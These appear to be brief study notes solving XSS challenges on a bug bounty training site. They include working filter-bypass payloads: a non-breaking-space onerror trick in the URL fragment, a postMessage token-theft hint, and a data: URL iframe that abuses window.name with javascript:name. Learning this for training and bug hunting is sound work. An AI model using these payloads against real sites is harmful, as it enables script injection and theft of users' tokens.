Give some space to this XSS Filter

  • Check the page source, read the JS code, understand it how it is working, how it is filtering the payload.

  • try different payloads with tag on URI with fragment(#)

  • On fileformat.info check for "space" in search box. And choose break space which in UTF8 is %C2%A0

Now try -

onerror=%C2%A0a()

Since above work, as checked in page source.

we can try:

#onerror=%C2%A0alert(socument.domain)

Steal teh token!

Use top.postmessage({uname:"test"},*)

This strict URL filter should prevent XSS, right?

solution: data:text/html,\<iframe name="\<svg onload=alert(document.domain)>" src=https://www.bugbountytraining.com/challenges/challenge-6.php?url=javascript:name>

explanation: When using the javascript pseudo scheme, if the returned value is a string, browsers will write it onto the page like document.write. This is why some bookmarklets have a void(0) at the end to prevent the results accidentally return a string.

Another thing to know is the window.name property persists even after navigation, and we can control this value.

So, we can assign window.name with a XSS payload in HTML, then use javascript:name so that it writes the payload onto the page.